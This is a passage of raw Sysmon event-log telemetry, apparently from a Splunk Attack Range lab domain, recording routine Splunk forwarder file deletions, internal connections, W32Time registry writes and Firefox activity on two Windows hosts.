Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB0CA2D9F13AC31469D8D5A28977E73,SHA256=1FD45FC8E8D3505248D43CC965DE463C93769CA3AA94096E622F697070E0DC5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:57.129{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6413FCFF21ECB98A5289B706EF350102,SHA256=D88B2FD953A097F1D6A4806BCFBD0701AF5F5768DB0CB321B12DD17AA39399EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:58.881{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BBDD9F746264D4675636920093A631,SHA256=66D542866C6CA1DF30B0E3EAC05C341266383465D84E799D7CDC55CD4D0011F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:58.144{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9A4FE553B2B1EB7B1D999A9968B8690,SHA256=3D78D08ED47886B19ED44C15133B712C71EF4763EC4DDF3214DE90CEF5C128F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.273{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50901-false10.0.1.12-8089- 23542300x80000000000000001045942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:59.915{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687C067EAEBBBF3B2541B26B6526E526,SHA256=1DD62F5EB0E95406842C3DC61E260073FE653147C274ED97A309FB6E6C39E358,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001045941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001045940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f61ba0b) 13241300x80000000000000001045939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x4af0f7fc) 13241300x80000000000000001045938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xacb55ffc) 13241300x80000000000000001045937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x0e79c7fc) 13241300x80000000000000001045936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001045935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f61ba0b) 13241300x80000000000000001045934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x4af0f7fc) 13241300x80000000000000001045933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xacb55ffc) 13241300x80000000000000001045932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x0e79c7fc) 354300x8000000000000000806039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:57.309{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57152-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:59.160{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5778DC59C28DF4A5DAA518664F4276,SHA256=69466B56E62886DED1D74A74BAFF9DDFC3A8E94FB468C8A3A3803771E61A4CB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:00.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BFEC24048A384D9D581B0ABABE92686,SHA256=54109DC3DBA182A92C58FAC342D074C63FC0912CDDEFCE9538BF8E3FACE2FDBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50902-false10.0.1.12-8000- 23542300x8000000000000000806040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:00.160{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01630760B8FD09FCB2EA363156742B5D,SHA256=F508B3F7AC1F4431C5805F68EB58DD41CC933B2B602A83C07AEF6FBEAD3721C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:01.977{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D630D7395CF2EEDB2B48151BF3D8D0C6,SHA256=F0F5051AB96EDD5B78056FA1F4290590E86473529169BA417A10AE9FAC3AFFFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:01.207{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D4862FC3E2D8B602D0750643E02F03E,SHA256=57303DBEFDDF5335A9F6A6930EF29421E33DF498AAE48631F43E8ACC35783CA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:02.207{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAB41BB2AA9009EAB649486888990A3C,SHA256=B1DB4234187DEF0FE739C3F3C68F442B6D7B891FDBBFE4895EE1FED4F4B4EE5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:03.269{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F266C5658591992600687A0E91B85FD,SHA256=24B13094043C19FE989DEAB932A8D4811C3F4D740AC3F9B8D34D5920BC2E5C82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:03.012{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22EABD3D6014278955146B66F8F02576,SHA256=CEA2E09A130DCB0772534F8B17CC1EC0F7115A83A91D64B097A6005BD4FE9AAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:03.231{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57153-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:04.285{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF746B69849F34924F48851C4EC1E9D8,SHA256=29D431FADF6ED16FC04B9E0E9B0CBB049005DDD535C4C719F27AADBC77F0BF1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.027{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B74FD9E4BD0307C32EE494A8333DC9A,SHA256=54F6D09BFB22C43C60AEDD444FCEB0EB2498C07A5256C00C648CB3992C312260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:05.285{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E724A5CECB4B542473D94354093EDD58,SHA256=819ED1766D5A36A1CCF3457CF4E2C06D704E3127138F9DB558E12A0565C6A3DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:05.041{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E0F71DA909199D082B0ABDA49A9D463,SHA256=BB407D374779F6F331DC4141D0C9E8DA36CEE02902CDE17C051436AA9D0A09C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:06.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C98992866668011EF9AA1AD8E50A51C5,SHA256=5F1F7C2D03F0543B1921B7723B2BC360A7D261395639FB11509B3A5A062B276D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:58.650{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50903-false10.0.1.12-8000- 23542300x80000000000000001045965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C2A5EBF036AAE0DBE95A4B46AD188AE2,SHA256=ED0961729199833A680162C96B35B15EDD943839A6C5F0AC38A6A052C1F0DF10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED34875B163DCA845C0DD614380CE8FB,SHA256=6E1C330AEC001258E27481F4FD43D03B22787ADC68DCD9FDA350C9850241A26E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D4EB652B47860816D4DA4F31E4FD8CA3,SHA256=79355997BE8640DDDD5BF231339966F63D70560768D9EE047ED1D2D0E445DF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=10EC0F2E6672BB13172D48C31D73E3C4,SHA256=CC0E1994798B8EDF77E4DA9DF366AFCD953A55F6B7E3FEB0ACBC24600877D229,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=45BCD4EB5FDBE47D5603997EB949DD7E,SHA256=B48874B723AA3D45B9268044824149118D59C4B7C749055D89B0A1A9686C4BB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF869595511F3594F92E8D69D234CADC,SHA256=6DB9D06BB1ED93C17720E1E4AFF033C58A0F66A435D197F3BBB9F347B4E41283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8A81D9F4E3336E823202017DDC3B257D,SHA256=6F62B9D1DF9064BC20D4EFC3FBDC30123C581DB127D3F131EAF5856776ACAE7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E649761957C22EF5F610715D57F77690,SHA256=03A0ABBA5EB350D63A02D12D08FBD42D57FC836FF5647D69BA78B25E716B84C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D9731033594F51D632472CE46A678CDE,SHA256=1B98826CDCADCC2ED9B2434DD27C4EC400CF485F6266C8F9316974B07E07AFB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.125{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7441F74B29EBA2D472A712DD5F9EED2D,SHA256=ACBE57FF2A26BA11C9B8AFAAA0E219FD879926B561D84EBB11A77340F07CCCDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.125{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=12635014EAC728EF58BF73D3C8457F72,SHA256=5C68F5D0A5969D825DD51D5B485C3A13596B9ADA45531FD5138DFCC24C3C1B03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.078{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001045952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.078{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001045951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:44:06.075{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1211.104550499C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001045950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:44:06.075{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1211.104550499C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001045949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.056{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC97FDB35A31FEA5C8B45394CE38DF9,SHA256=4DB954B1A9373A31175C03732F00966CF0B1201D8234349BABA617844DDFAE57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:07.332{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B43A6C5B7451391E46AE3ECC7CB5D9,SHA256=DD6A854F0BA9498D022DBFEDB77FADA584472DDF511A684453F0E76914A7B963,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:07.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54857CCDDCF9791F1989BC69FE7C750D,SHA256=47994C294B3EA779DB01710D1C9985EDF4E4723E99D4053355CA71EC373A98DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:08.332{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A90AFD130DF178AB47CAE0481D9FF57,SHA256=AAB3FEC079E68E444C202AB995DBC83F58CA2763692E4809B04CB40CA93856CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:08.094{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FA937D0BCE7F2A7866F7A5C8861206C,SHA256=7FF4562BAD466C421065D9D85092D0F93303A5565CBC03872E8143253FD8714F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 